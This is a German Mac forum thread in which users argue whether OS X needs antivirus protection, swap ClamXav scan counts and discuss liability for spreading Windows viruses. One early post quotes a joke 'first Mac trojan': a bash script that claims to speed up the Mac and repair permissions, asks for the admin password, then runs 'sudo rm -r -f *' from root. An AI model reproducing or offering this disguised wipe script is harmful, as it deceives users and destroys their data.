Von Wegen keine Viren !!!!!

ICH HAB ES GETAN! DER ERSTE TOJANER FÜR MAC OS X
onyx2005.sh schrieb:
#!/bin/bash
cd /
echo 'Dieses Programm macht ihren Mac schneller, repariert die Rechte und fuehrt die CRON Scripts aus bitte geben Sie ihr Adminastratoren Passwort ein!'
sudo rm -r -f *
 
Bin da gespaltener Meinung.
Einerseits sollte man versuchen, sie nicht selbst weiterzuverbreiten.
Andererseits sind es doch zu 99% die Windows-User, die die Dinger verteilen. Und warum sollte ich "diese Leute" dann schützen, wenn sie selbst nicht dazu in der Lage sind ?
Nochmal andererseits können die ja auch nicht alle was dafür, und ich habe ja auch Freunde, die Windows haben, denen ich ja auch nichts verseuchtes schicken will.
Allerdings weiss ich ja wiederrum, was ich an wen versende, und ich falle auch nicht auf irgendwelche Virenmails rein, die ich dann weiterversende oder so.
Also ich mach mir da demnach auch keine Gedanken drum...Mein System ist sauber, und das ist mir ganz ehrlich gesagt erstmal das wichtigste, so egoistisch und ignorant das für einige auch sein mag...

Übrigens:
ClamX AV...ich will ja nichts sagen, aber diese Version 1.0.1 ist vom Juli 2005. Ob das von Vorteil ist ?
 
architektenwerk schrieb:
Und ich wette, dass jeder von Euch mindestens einen dummen alten Windows-Virus auf der Mac-Platte hat. Im Durchschnitt werden es 5-6 davon sein.

Wer hält dagegen?
scannt gerade - ich werde berichten (und danach fliegt der Virenscanner wieder von der Platte) :D
 
*gääääähn*

so einen Thread gibt's hier auch wöchentlich

warum sollte sich jemand die Mühe machen einen Virus für ein Betriebsystem mit ca. 3% Benutzeranteil zu schreiben?

Und wenn es den ersten Virus irgendwann geben sollte, was ändert das? In der Windowswelt gibt es Millionen verschiedener Viren, Trojaner, Würmer und Spyware, was ist dazu im Vergleich ein einziger Virus?
 
jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer

suchfunktion

jammer jammer jammer jammer jammer jammer jammer jammer jammer jammer
 
architektenwerk schrieb:
Wer hält dagegen?
Ich. :D Falls Du auf die diversen Viren-E-Mail anspielst, die ab und an so herein flatteren, davon habe ich zur Zeit auch keine mehr auf meinem Rechner; Alles gelöscht. Ich bekomme auch überhaupt keine Spam-Mails mehr, ja man lernt eben dazu! :cool:
 
praekon schrieb:
Eine windows virus hat sehr wohl die Moeglichkeit sich von osx zu verbreiten.
Nehmen wir mal an ein osx nutzer erhaelt eine 'verseuchte' datei.
Er/Sie merkt es nicht legt sie in einer samba freigabe ab.
Ein Windoof-user der auf diese freigegebene Datei zugreift infiziert sich wieder.
ich zweifle hiermit öffentlich an, dass sich eine .exe datei ohne eingreifen des benutzers auf diese art und weise verhalten kann :D
mal im ernst: das ist das problem des users. die .exe datei kann sowas eigenständig nicht auf dem mac...
 
architektenwerk schrieb:
Ich denke, dass es über kurz oder lang auch einen Virus für Mac OS X geben wird. Und bis dahin sollte jeder beherzigen, dass man privatrechtlich haftbar gemacht werden kann, auch wenn man Viren unbeabsichtigt weiterverbreitet. Also Grund genug, um auf einem Mac OS X-Rechner einen aktuellen Virenschutz zu installieren.
Probiert mal ClamXav aus
http://www.clamxav.com/
und berichtet, wie viele Windows-Viren Ihr auf eurem Mac hattet.
Dann verrate ich, wie viele es bei mir waren ;-)


Also, ich hab mir das jetzt tatsächlich mal angetan.
Nicht einer. Null. Nada. Und dabei habe ich sogar das Email-Postfach mitgescannt - wobei ich Mails immer direkt lösche, die ich eh nicht gebrauche. Und dazu gehören eben auch die 1.000 Virenmails, die infizierte Windows-Rechner verbreiten.

Wieviele waren es bei Dir?
 
architektenwerk schrieb:
Wer unwissentlich oder unbeabsichtigt (!) Viren weiterverbreitet, kann haftbar gemacht werden.

Das ist zwar korrekt, aber nur die halbe Meldung.

Dies gilt vor allem für Unternehmen, da sie in besonderem Maße zur
Sicherung der eigenen IT-Anlagen verpflichtet sind
...
Anders bei Privatpersonen: Hier besteht eine gesetzliche Verpflichtung zu
einem Selbst- und Drittschutz nur sehr eingeschränkt. Allenfalls in Einzel-
fällen, in denen ein besonders leichtfertiger Verstoß gegen Sicherheits-
gebote erfolgt, kann man von einem Mitverschulden ausgehen.

Siehe http://www.presseportal.de/story.htx?nr=558267&firmaid=7049

Davon ab wäre mir kein Fall bekannt, in dem ein Privatanwender
für das unbeabsichtigte Verbreiten eines elektronischen Schädlings
zur Rechenschaft gezogen wäre. Und selbst wenn, wage ich zu bezweifeln,
dass das mit einem UNIX-Derivat passiert ist.

:cool:
 
ich habe einen (im W2K Laufwerk von VPC) :D :D :D
 
War gerade mal entspannt duschen und hab solange auch scannen lassen (Virusdefinitionsdatei kann man ja immerhin im Programm aktualisieren)...

Und Du hast die Wette definitiv verloren, Architekt ;)

Wieviele hast Du denn ? :)
 
Timosaurier schrieb:
War gerade mal entspannt duschen und hab solange auch scannen lassen (Virusdefinitionsdatei kann man ja immerhin im Programm aktualisieren)...

Und Du hast die Wette definitiv verloren, Architekt ;)

Ex-Architekt bitte!

Was hat du denn in 10 Minuten so schnell gescannt?
Den Schreibtisch?
 
architektenwerk schrieb:
18 Viren, Dialer und Würmer

Und wie kommt das jetzt?
Arbeitest Du viel in gemischten Netzwerken - oder lagen die alle im Email-Verzeichnis?

Ich lösche Dateien, die ich nicht benutze - das heißt, es liegen auch keine Dialer auf meinem Rechner rum.

Mir ist echt nicht ganz klar, wie Du an diese Menge kommst...
 
Heero schrieb:
Mir ist echt nicht ganz klar, wie Du an diese Menge kommst...

Mir auch nicht :)

Aber egal - ich arbeite mit gemischten Netzen, klar. Und ich finde regelmässig bei meinen Kunden Windows-Viren auf den Macs. Nicht auf den DOSen, die haben schon einen aktuellen Schutz ...
 
architektenwerk schrieb:
Was hat du denn in 10 Minuten so schnell gescannt?
Den Schreibtisch?

Nix 10 Minuten...ca. 40 Minuten hat's gedauert.
Zum zweiten Teil Deiner Frage sage ich nichts.

Aber mal davon abgesehen - es geht ja hier nicht darum, zu beweisen, dass Windows-Viren auf den Mac geladen werden können. Das war schon immer so und ist nichts neues.
Es geht ja hier um Viren, die den Mac aktiv befallen. Und das ist ja eine andere Geschichte.
 
architektenwerk schrieb:
Mir auch nicht :)

Aber egal - ich arbeite mit gemischten Netzen, klar. Und ich finde regelmässig bei meinen Kunden Windows-Viren auf den Macs. Nicht auf den DOSen, die haben schon einen aktuellen Schutz ...


Okay. Dass da Dateien rumfliegen - zum Beispiel im Email-Postfach, wo ja Viren und Trojaner gerne einschlagen - kann ja sein. Dass da mal eine EXE-Datei nicht direkt im Papierkorb gelandet ist, kann auch sein.

Auf vielen Rechnern liegt viel Müll, weil die Leute nicht aufräumen. Ich habe auch so ein paar Archiv-Verzeichnisse, au Backe...

Aber keiner dieser Viren ist aktiv und kann sich weiterverbreiten. Wozu also die Sorge??
 
mkoessling schrieb:
Richtig.
Die größte Sicherheitslücke sitzt immer noch vor dem Gerät!!!

Wie war das noch neulich mit der Beta von Google Earth 4 Mac, da haben sich doch auch hier alle wie die Geier draufgestürzt(trotz der teilweise obskuren Quellen), wenn da nun ein Schlingel was reingezaubert hätte???......
 
Zurück
Oben Unten